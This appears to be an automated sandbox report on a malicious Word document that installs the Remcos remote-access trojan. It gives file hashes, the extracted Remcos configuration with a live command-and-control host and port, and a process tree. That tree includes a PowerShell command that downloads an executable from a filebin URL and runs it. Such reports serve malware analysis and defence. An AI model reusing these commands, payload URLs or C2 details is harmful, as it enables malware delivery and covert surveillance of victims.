Overview

overview

10

Static

static

8

Shahini Fe...ta.doc

windows7_x64

8

Shahini Fe...ta.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    153s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    30-03-2022 05:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Shahini Ferramenta.doc

  • Size

    69KB

  • MD5

    e5f86454862a7288a5fceb215872cd6f

  • SHA1

    c9586e701a4bb90423f0e4ccf09290b2642c1d39

  • SHA256

    5189b2a9e69b48ef464f8f59ab722717ab162eb33ab7f493791f13e28d59473e

  • SHA512

    aac53e51bef7c7640fac1aa973aef0d4d72b46be3698e0f7fdbff98648727d3fdff47cfd59539426e27d2832e604aa6815f6c74b29624ab555c3b5b806457839

Score
10/10
remcostuesdaydiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

TUESDAY

C2

achimumuazi.hopto.org:2311

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Remcos-5UAINN

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 13 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Shahini Ferramenta.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1092
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 658F2305DF738BA6183374D40E2CA3BB
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:1644
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:3204
      • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files\new.EXE
        "C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files\new.EXE"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:948
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c newfile.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1372
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "Invoke-WebRequest -uri https://filebin.net/zcjmkr2ooaz2x4l6/NEW_FILE.exe -o NEW-FILE.exe"
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NEW-FILE.exe
            NEW-FILE.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:212
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        3⤵
        • Modifies file permissions
        PID:5068
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files"
        3⤵
          PID:2604

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NEW-FILE.exe
      Filesize

      462KB

      MD5

      32b9acd9504f3f4930b3f0d15197c670

      SHA1

      6ba97b5ebbede658b47009808c4fa2575bb35efd

      SHA256

      da609d3211d60d5b11feaeaa717834cbe86e18103a1ed4fc09c2ee3e1cff9442

      SHA512

      3d87446fadcb4ded1f081d31dc45881bf3f3f075d7108aca04f7001d8044c54ee70095f140040f15185174a5f6527c51e37812eb437ff3bbd1edfd1fc41d4521

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NEW-FILE.exe
      Filesize

      462KB

      MD5

      32b9acd9504f3f4930b3f0d15197c670

      SHA1

      6ba97b5ebbede658b47009808c4fa2575bb35efd

      SHA256

      da609d3211d60d5b11feaeaa717834cbe86e18103a1ed4fc09c2ee3e1cff9442

      SHA512

      3d87446fadcb4ded1f081d31dc45881bf3f3f075d7108aca04f7001d8044c54ee70095f140040f15185174a5f6527c51e37812eb437ff3bbd1edfd1fc41d4521

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\newfile.bat
      Filesize

      141B

      MD5

      9d58dd13188e8866b8b35b983d5f325e

      SHA1

      336626d0bbff62be43c06a8f81fcd7b800f5170e

      SHA256

      74b3d545da69dcb0b01485ea7228264760c14be1e02e93246aaa0081a954d118

      SHA512

      0e0c569fa51dd313c0748d7bb4222e1b9909c216cad47ae036a1f16e819b1486e4365488b5e3e6b3657a903cf45ca0ad053afcafb33c5fa273981c1732fffd84

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files.cab
      Filesize

      154KB

      MD5

      4ca3f13f663c6642e86385b16135091a

      SHA1

      cf702e60f418ddcfd0335567262c32fe68b04315

      SHA256

      fd852cf9fde6e989008e158d1ec4fc62092a62b8f3a586fd510deffdfc2ffca9

      SHA512

      3839a45a7fb209b8600d06707c8b50f183522c2924c6fee4ec9642290e077504d7193b6d58610ca3c516ac5d86341a83c8eca8928d4a76f67cf213176cfa96bc

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files\new.EXE
      Filesize

      154KB

      MD5

      1dd8ebed84b3c8d1cbfff041af690950

      SHA1

      ed951544befc41dcb8fee77aadaa7f684678cb60

      SHA256

      2b5c02c1257a29683a40d350bd3237e0eed1f610e013c154f5fbe661362d56f2

      SHA512

      4a38efbe84a4a8a93ed123949b0e051f0ce11d174a19ca09c20a9cb326df18a8fab79f8b8f3d221c80a761004220809ad832dc0c8cb03e8a96c06ddbd985de7f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\files\new.EXE
      Filesize

      154KB

      MD5

      1dd8ebed84b3c8d1cbfff041af690950

      SHA1

      ed951544befc41dcb8fee77aadaa7f684678cb60

      SHA256

      2b5c02c1257a29683a40d350bd3237e0eed1f610e013c154f5fbe661362d56f2

      SHA512

      4a38efbe84a4a8a93ed123949b0e051f0ce11d174a19ca09c20a9cb326df18a8fab79f8b8f3d221c80a761004220809ad832dc0c8cb03e8a96c06ddbd985de7f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\msiwrapper.ini
      Filesize

      1KB

      MD5

      652cccfbc43ceee3369c09165142fd9b

      SHA1

      b96729bb8825544a07c00db520f2ec4689f7c375

      SHA256

      6a40e416ea92e559e4c59e07770eaf0d388e543d5d29f809bf9545d613ff1922

      SHA512

      9280ded7f77093a38e12f24ba570a8400f2afcc34e84dee1e836c4dfe695d0e149e7d38f97595181d08d80db6fe38da9f2db4233d6d0d4ca2dfb175ca192a535

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MW-adab3c7a-c1cb-4d43-b0c4-8d63fe1dc2f5\msiwrapper.ini
      Filesize

      1KB

      MD5

      b0131803fa4b83e09f8b1eb36cc19a4f

      SHA1

      449fab54587d8b127892b99ccd1fe0670ebb1d4d

      SHA256

      8bc4af2c0021eabdf4cbe97209ac6329694245ed169a17939e514bc760f49b92

      SHA512

      ee01578ec79377dc44235fa74a1934c0af804c144773a61070cd04ef2c20354c1d0781758e6aba9cabb5fe32b0e0d1cb74c3aed178e1ee32d68f417c3dfd681a

      Download Submit

    • C:\Windows\Installer\MSI63F8.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • C:\Windows\Installer\MSI63F8.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • C:\Windows\Installer\MSI8D3D.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • C:\Windows\Installer\MSI8D3D.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • C:\Windows\Installer\MSI8E86.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • C:\Windows\Installer\MSI8E86.tmp
      Filesize

      208KB

      MD5

      4caaa03e0b59ca60a3d34674b732b702

      SHA1

      ee80c8f4684055ac8960b9720fb108be07e1d10c

      SHA256

      d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

      SHA512

      25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

      Download Submit

    • memory/212-154-0x0000000000000000-mapping.dmp

      Download

    • memory/948-144-0x0000000000000000-mapping.dmp

      Download

    • memory/1092-166-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-164-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-134-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-165-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-135-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-132-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-131-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-167-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1092-133-0x00007FFCDF8F0000-0x00007FFCDF900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1372-146-0x0000000000000000-mapping.dmp

      Download

    • memory/1428-136-0x0000000000000000-mapping.dmp

      Download

    • memory/1644-139-0x0000000000000000-mapping.dmp

      Download

    • memory/2604-163-0x0000000000000000-mapping.dmp

      Download

    • memory/3204-142-0x0000000000000000-mapping.dmp

      Download

    • memory/4404-152-0x000001FEEE793000-0x000001FEEE795000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4404-153-0x000001FEEE796000-0x000001FEEE798000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4404-151-0x000001FEEE790000-0x000001FEEE792000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4404-150-0x00007FFCF4170000-0x00007FFCF4C31000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4404-149-0x000001FED6280000-0x000001FED62A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4404-148-0x0000000000000000-mapping.dmp

      Download

    • memory/5068-157-0x0000000000000000-mapping.dmp

      Download